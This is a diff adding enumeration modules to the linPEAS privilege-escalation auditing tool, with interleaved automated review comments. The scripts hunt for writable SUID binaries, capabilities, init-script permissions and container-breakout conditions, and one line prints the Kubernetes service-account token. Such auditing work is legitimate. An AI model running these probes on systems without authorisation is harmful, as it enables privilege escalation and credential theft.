diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index ca9105a..b42abb6 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -13,7 +13,7 @@ If you want to **contribute adding the search of new files that can contain sens Also, in the comments of this PR, put links to pages where and example of the file containing sensitive information can be foud. ## Specific LinPEAS additions -From the PEASS-ng release **linpeas is auto-build from [linpeas_base.sh](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/linpeas_base.sh)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this file and create a PR to master**. +From the PEASS-ng release **linpeas is auto-build from [linpeas/builder](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/blob/master/linPEAS/builder/)**. Therefore, if you want to contribute adding any new check for linpeas/macpeas, please **add it in this directory and create a PR to master**. *Note that some code is auto-generated in the python but most of it it's just written in different files that willbe merged into linpeas.sh*. The new linpeas.sh script will be auto-generated in the PR. ## Specific WinPEAS additions diff --git a/build_lists/sensitive_files.yaml b/build_lists/sensitive_files.yaml index 7fd0282..b751bef 100644 --- a/build_lists/sensitive_files.yaml +++ b/build_lists/sensitive_files.yaml @@ -65,6 +65,8 @@ common_directory_folders: - /usr - /var +peas_checks: "peass{CHECKS}" + peas_extrasections_markup: "peass{EXTRA_SECTIONS}" peas_finds_markup: "peass{FINDS_HERE}" @@ -2395,6 +2397,21 @@ search: search_in: - common + - name: Jetty + value: + config: + auto_check: True + + files: + - name: "jetty-realm.properties" + value: + bad_regex: ".*" + remove_empty_lines: True + remove_regex: '^#' + type: f + search_in: + - common + - name: Wget value: config: 
diff --git a/linPEAS/builder/linpeas_builder.py b/linPEAS/builder/linpeas_builder.py index 181d76b..be16c29 100644 --- a/linPEAS/builder/linpeas_builder.py +++ b/linPEAS/builder/linpeas_builder.py @@ -1,5 +1,6 @@ from .src.peasLoaded import PEASLoaded from .src.linpeasBuilder import LinpeasBuilder +from .src.linpeasBaseBuilder import LinpeasBaseBuilder from .src.yamlGlobals import FINAL_LINPEAS_PATH import os @@ -7,7 +8,14 @@ import stat #python3 -m builder.linpeas_builder def main(): + # Load configuration ploaded = PEASLoaded() + + # Build temporary linpeas_base.sh file + lbasebuilder = LinpeasBaseBuilder() + lbasebuilder.build() + + # Build final linpeas.sh lbuilder = LinpeasBuilder(ploaded) lbuilder.build() lbuilder.write_linpeas(FINAL_LINPEAS_PATH) diff --git a/linPEAS/builder/linpeas_parts/available_software.sh b/linPEAS/builder/linpeas_parts/available_software.sh new file mode 100644 index 0000000..8da4d10 --- /dev/null +++ b/linPEAS/builder/linpeas_parts/available_software.sh 
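Review bot: The new `lbasebuilder.build()` step is commented as producing a temporary linpeas_base.sh, but main() neither removes it afterwards nor guards the later LinpeasBuilder steps, so an exception in `lbuilder.build()` or `write_linpeas()` leaves the intermediate file behind; if it really is temporary, run the two builder steps in a `try/finally` that deletes it, or reword the comment if the base file is meant to be kept. main() also has no docstring; `"""Load the YAML config, assemble linpeas_base.sh from the parts, then build and write the final linpeas.sh."""` would document the three-step pipeline the inline comments describe. I can't see from the hunk where LinpeasBaseBuilder writes its output or whether PEASLoaded() reads that file, so the ordering (config loaded before the base is built) is worth confirming; main() continues past the end of the hunk.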
@@ -0,0 +1,39 @@
+###########################################
+#---------) Available Software (----------#
+###########################################
+
+#-- 1AS) Useful software
+print_2title "Useful software"
+command -v "$CONTAINER_CMDS" nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch ctr authbind 2>/dev/null
+echo ""
+
+#-- 2AS) Search for compilers
+print_2title "Installed Compiler"
+(dpkg --list 2>/dev/null | grep "compiler" | grep -v "decompiler\|lib" 2>/dev/null || yum list installed 'gcc*' 2>/dev/null | grep gcc 2>/dev/null; command -v gcc g++ 2>/dev/null || locate -r "/gcc[0-9\.-]\+$" 2>/dev/null | grep -v "/doc/");
+echo ""
+
+if [ "$(command -v pkg 2>/dev/null)" ]; then
+print_2title "Vulnerable Packages"
+pkg audit -F | sed -${E} "s,vulnerable,${SED_RED},g"
+echo ""
+fi
+
+if [ "$(command -v brew 2>/dev/null)" ]; then
+print_2title "Brew Installed Packages"
+brew list
+echo ""
+fi
+
+if [ "$MACPEAS" ]; then
+print_2title "Writable Installed Applications"
+system_profiler SPApplicationsDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
+ if [ -w "$f" ]; then
+ echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
+ fi
+done
+
+system_profiler SPFrameworksDataType | grep "Location:" | cut -d ":" -f 2 | cut -c2- | while read f; do
+ if [ -w "$f" ]; then
+ echo "$f is writable" | sed -${E} "s,.*,${SED_RED},g"
+ fi
+done
diff --git a/linPEAS/builder/linpeas_parts/container.sh b/linPEAS/builder/linpeas_parts/container.sh
new file mode 100644
index 0000000..d249e3a
--- /dev/null
+++ b/linPEAS/builder/linpeas_parts/container.sh
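Review bot: The `if [ "$MACPEAS" ]; then` block that opens the "Writable Installed Applications" section has no closing `fi` inside this hunk, and the hunk header's 39-line count matches the lines shown, so as written the file ends on the second `done` with the `if` still open; unless a later part is expected to supply the `fi` when the pieces are concatenated, the assembled linpeas.sh will fail to parse. Add `fi` after the last `done`, or leave a comment at the top of the file naming which part closes the block. The Vulnerable Packages and Brew checks also run `pkg audit -F` and `brew list` without the `2>/dev/null` the other probes in this file use, so their stderr will interleave with the report output.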
@@ -0,0 +1,95 @@ +############################################## +#---------------) Containers (---------------# +############################################## +containerCheck + +print_2title "Container related tools present" +command -v "$CONTAINER_CMDS" + +print_2title "Container details" +print_list "Is this a container? ...........$NC $containerType" + +print_list "Any running containers? ........ "$NC +# Get counts of running containers for each platform +dockercontainers=$(docker ps --format "{{.Names}}" 2>/dev/null | wc -l) +podmancontainers=$(podman ps --format "{{.Names}}" 2>/dev/null | wc -l) +lxccontainers=$(lxc list -c n --format csv 2>/dev/null | wc -l) +rktcontainers=$(rkt list 2>/dev/null | tail -n +2 | wc -l) +if [ "$dockercontainers" -eq "0" ] && [ "$lxccontainers" -eq "0" ] && [ "$rktcontainers" -eq "0" ] && [ "$podmancontainers" -eq "0" ]; then +echo_no +else +containerCounts="" +if [ "$dockercontainers" -ne "0" ]; then containerCounts="${containerCounts}docker($dockercontainers) "; fi +if [ "$podmancontainers" -ne "0" ]; then containerCounts="${containerCounts}podman($podmancontainers) "; fi +if [ "$lxccontainers" -ne "0" ]; then containerCounts="${containerCounts}lxc($lxccontainers) "; fi +if [ "$rktcontainers" -ne "0" ]; then containerCounts="${containerCounts}rkt($rktcontainers) "; fi +echo "Yes $containerCounts" | sed -${E} "s,.*,${SED_RED}," +# List any running containers +if [ "$dockercontainers" -ne "0" ]; then echo "Running Docker Containers" | sed -${E} "s,.*,${SED_RED},"; docker ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$podmancontainers" -ne "0" ]; then echo "Running Podman Containers" | sed -${E} "s,.*,${SED_RED},"; podman ps | tail -n +2 2>/dev/null; echo ""; fi +if [ "$lxccontainers" -ne "0" ]; then echo "Running LXC Containers" | sed -${E} "s,.*,${SED_RED},"; lxc list 2>/dev/null; echo ""; fi +if [ "$rktcontainers" -ne "0" ]; then echo "Running RKT Containers" | sed -${E} "s,.*,${SED_RED},"; rkt list 2>/dev/null; echo ""; 
fi +fi + +#If docker +if echo "$containerType" | grep -qi "docker"; then +print_2title "Docker Container details" +inDockerGroup +print_list "Am I inside Docker group .......$NC $DOCKER_GROUP\n" | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Looking and enumerating Docker Sockets\n"$NC +enumerateDockerSockets +print_list "Docker version .................$NC$dockerVersion" +checkDockerVersionExploits +print_list "Vulnerable to CVE-2019-5736 ....$NC$VULN_CVE_2019_5736"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +print_list "Vulnerable to CVE-2019-13139 ...$NC$VULN_CVE_2019_13139"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +if [ "$inContainer" ]; then + checkDockerRootless + print_list "Rootless Docker? ................ $DOCKER_ROOTLESS\n"$NC | sed -${E} "s,No,${SED_RED}," | sed -${E} "s,Yes,${SED_GREEN}," +fi +if df -h | grep docker; then + print_2title "Docker Overlays" + df -h | grep docker +fi +fi + +if [ "$inContainer" ]; then +echo "" +print_2title "Container & breakout enumeration" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout" +print_list "Container ID ...................$NC $(cat /etc/hostname)" +if echo "$containerType" | grep -qi "docker"; then + print_list "Container Full ID ..............$NC $(basename $(cat /proc/1/cpuset))\n" +fi +if echo "$containerType" | grep -qi "kubernetes"; then + print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n" + print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n" +fi + +checkContainerExploits +print_list "Vulnerable to CVE-2019-5021 .. 
$VULN_CVE_2019_5021\n"$NC | sed -${E} "s,Yes,${SED_RED_YELLOW}," +echo "" + +print_2title "Container Capabilities" +capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g" +echo "" + +print_2title "Privilege Mode" +if [ -x "$(command -v fdisk)" ]; then + if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then + echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW}," + else + echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN}," + fi +else + echo_not_found +fi +echo "" + +print_2title "Interesting Files Mounted" +(mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" +echo "" + +print_2title "Possible Entrypoints" +ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq +echo "" +fi diff --git a/linPEAS/builder/linpeas_parts/interesting_files.sh b/linPEAS/builder/linpeas_parts/interesting_files.sh new file mode 100644 index 0000000..d1bc7be --- /dev/null +++ b/linPEAS/builder/linpeas_parts/interesting_files.sh 
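Review bot: In the Docker Overlays check, `if df -h | grep docker; then` runs grep without `-q`, so the matching lines are printed before `print_2title "Docker Overlays"` and then printed a second time by the `df -h | grep docker` in the body; change the condition to `if df -h 2>/dev/null | grep -q docker; then` and keep the second command as the one that prints. `$(cat /etc/hostname)` and `$(basename $(cat /proc/1/cpuset))` are unquoted inside the print_list arguments; harmless for the usual values, but `basename "$(cat /proc/1/cpuset)"` is the safe form. Also note that `/**/entrypoint*` and `/**/*.sh` in the Possible Entrypoints `ls` are plain `*` globs in POSIX sh (no globstar), so they only match one directory level below `/`, which the line does not make obvious; a short comment stating the intended depth would help.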
@@ -0,0 +1,639 @@ +########################################### +#----------) Interesting files (----------# +########################################### + +##-- IF) SUID +print_2title "SUID - Check easy privesc, exploits and write perms" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +if ! [ "$STRINGS" ]; then + echo_not_found "strings" +fi +if ! [ "$STRACE" ]; then + echo_not_found "strace" +fi +suids_files=$(find / -perm -4000 -type f ! -path "/dev/*" 2>/dev/null) +for s in $suids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total"; then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo $s | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SUID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! 
[ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do + sline_first="$(echo "$sline" | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then + printf $ITALIC + echo "----------------------------------------------------------------------------------------" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." + OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH + export LD_LIBRARY_PATH="" + timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf $NC + export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH + echo "----------------------------------------------------------------------------------------" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + + +##-- IF) SGID +print_2title "SGID" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid" +sgids_files=$(find / -perm -2000 -type f ! 
-path "/dev/*" 2>/dev/null) +for s in $sgids_files; do + s=$(ls -lahtr "$s") + #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder + if echo "$s" | grep -qE "^total";then break; fi + + sname="$(echo $s | awk '{print $9}')" + if [ "$sname" = "." ] || [ "$sname" = ".." ]; then + true #Don't do nothing + elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then + echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED}," + elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits) + echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + c="a" + for b in $sidB; do + if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then + echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m," + c="" + break; + fi + done; + if [ "$c" ]; then + if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then + echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW}," + else + echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED}," + printf $ITALIC + if ! 
[ "$FAST" ] && [ "$STRINGS" ]; then + $STRINGS "$sname" | sort | uniq | while read sline; do + sline_first="$(echo $sline | cut -d ' ' -f1)" + if echo "$sline_first" | grep -qEv "$cfuncs"; then + if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path + if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n" + fi + else #If not a path + if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary + printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n" + fi + fi + fi + done + if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then + printf "$ITALIC" + echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..." 
+ timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g" + printf "$NC" + echo "" + fi + fi + fi + fi + fi +done; +echo "" + +##-- IF) Misconfigured ld.so +print_2title "Checking misconfigurations of ld.so" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#ld-so" +printf $ITALIC"/etc/ld.so.conf\n"$NC; +cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" +cat /etc/ld.so.conf 2>/dev/null | while read l; do + if echo "$l" | grep -q include; then + ini_path=$(echo "$l" | cut -d " " -f 2) + fpath=$(dirname "$ini_path") + if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + for f in $fpath/*; do + printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" + done + fi +done +echo "" + +##-- IF) Capabilities +print_2title "Capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +echo "Current capabilities:" +(capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh" +(cat "/proc/$$/status" | grep Cap | sed -${E} "s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$$/status" +echo "" +echo "Shell capabilities:" +(capsh --decode=0x"$(cat /proc/$PPID/status 2>/dev/null | grep CapEff | awk '{print $2}')" 2>/dev/null) || echo_not_found "capsh" +(cat "/proc/$PPID/status" | grep Cap | sed -${E} 
"s,.*0000000000000000|CapBnd: 0000003fffffffff,${SED_GREEN},") 2>/dev/null || echo_not_found "/proc/$PPID/status" +echo "" +echo "Files with capabilities (limited to 50):" +getcap -r / 2>/dev/null | head -n 50 | while read cb; do + capsVB_vuln="" + + for capVB in $capsVB; do + capname="$(echo $capVB | cut -d ':' -f 1)" + capbins="$(echo $capVB | cut -d ':' -f 2)" + if [ "$(echo $cb | grep -Ei $capname)" ] && [ "$(echo $cb | grep -E $capbins)" ]; then + echo "$cb" | sed -${E} "s,.*,${SED_RED_YELLOW}," + capsVB_vuln="1" + break + fi + done + + if ! [ "$capsVB_vuln" ]; then + echo "$cb" | sed -${E} "s,$capsB,${SED_RED}," + fi + + if ! [ "$IAMROOT" ] && [ -w "$(echo $cb | cut -d" " -f1)" ]; then + echo "$cb is writable" | sed -${E} "s,.*,${SED_RED}," + fi +done +echo "" + +##-- IF) Users with capabilities +print_2title "Users with capabilities" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#capabilities" +if [ -f "/etc/security/capability.conf" ]; then + grep -v '^#\|none\|^$' /etc/security/capability.conf 2>/dev/null | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +else echo_not_found "/etc/security/capability.conf" +fi +echo "" + +##-- IF) Files with ACLs +print_2title "Files with ACLs (limited to 50)" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#acls" +( (getfacl -t -s -R -p /bin /etc $HOMESEARCH /opt /sbin /usr /tmp /root 2>/dev/null) || echo_not_found "files with acls in searched folders" ) | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," + +if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && ! 
[ "$(command -v getfacl)" ]; then #Find ACL files in macos (veeeery slow) + ls -RAle / 2>/dev/null | grep -v "group:everyone deny delete" | grep -E -B1 "\d: " | head -n 70 | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," +fi +echo "" + +##-- IF) Files with ResourceFork +#if [ "$MACPEAS" ] && ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then # TOO SLOW, CHECK IT LATER +# print_2title "Files with ResourceFork" +# print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#resource-forks-or-macos-ads" +# find $HOMESEARCH -type f -exec ls -ld {} \; 2>/dev/null | grep -E ' [x\-]@ ' | awk '{printf $9; printf "\n"}' | xargs -I {} xattr -lv {} | grep "com.apple.ResourceFork" +#fi +#echo "" + +##-- IF) .sh files in PATH +print_2title ".sh files in path" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#script-binaries-in-path" +echo $PATH | tr ":" "\n" | while read d; do + for f in $(find "$d" -name "*.sh" 2>/dev/null); do + if ! [ "$IAMROOT" ] && [ -O "$f" ]; then + echo "You own the script: $f" | sed -${E} "s,.*,${SED_RED}," + elif ! 
[ "$IAMROOT" ] && [ -w "$f" ]; then #If write permision, win found (no check exploits) + echo "You can write script: $f" | sed -${E} "s,.*,${SED_RED_YELLOW}," + else + echo $f | sed -${E} "s,$shscripsG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED},"; + fi + done +done +echo "" + +print_2title "Broken links in path" +echo $PATH | tr ":" "\n" | while read d; do + find "$d" -type l 2>/dev/null | xargs file 2>/dev/null | grep broken | sed -${E} "s,broken,${SED_RED},"; +done +echo "" + + +if [ "$MACPEAS" ]; then + print_2title "Unsigned Applications" + macosNotSigned /System/Applications +fi + +##-- IF) Unexpected folders in / +print_2title "Unexpected in root" +if [ "$MACPEAS" ]; then + (find / -maxdepth 1 | grep -Ev "$commonrootdirsMacG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +else + (find / -maxdepth 1 | grep -Ev "$commonrootdirsG" | sed -${E} "s,.*,${SED_RED},") || echo_not_found +fi +echo "" + +##-- IF) Files (scripts) in /etc/profile.d/ +print_2title "Files (scripts) in /etc/profile.d/" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#profiles-files" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + (ls -la /etc/profile.d/ 2>/dev/null | sed -${E} "s,$profiledG,${SED_GREEN},") || echo_not_found "/etc/profile.d/" + if ! [ "$IAMROOT" ] && [ -w "/etc/profile" ]; then echo "You can modify /etc/profile" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/profile.d/" ]; then echo "You have write privileges over /etc/profile.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ "$(find /etc/profile.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/profile.d/ '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi +fi +echo "" + + ##-- IF) Files (scripts) in /etc/init.d/ +print_2title "Permissions in init, init.d, systemd, and rc.d" +print_info "https://book.hacktricks.xyz/linux-unix/privilege-escalation#init-init-d-systemd-and-rc-d" +if [ ! "$MACPEAS" ]; then #Those folders don´t exist on a MacOS + if ! [ "$IAMROOT" ] && [ -w "/etc/init/" ]; then echo "You have write privileges over /etc/init/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/init.d/" ]; then echo "You have write privileges over /etc/init.d/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/init.d/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d/init.d" ]; then echo "You have write privileges over /etc/rc.d/init.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
[ "$IAMROOT" ] && [ "$(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d/init.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/usr/local/etc/rc.d" ]; then echo "You have write privileges over /usr/local/etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /usr/local/etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/rc.d" ]; then echo "You have write privileges over /etc/rc.d" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/rc.d -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ -w "/etc/systemd/" ]; then echo "You have write privileges over /etc/systemd/" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! [ "$IAMROOT" ] && [ "$(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find /etc/systemd/ -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi + if ! 
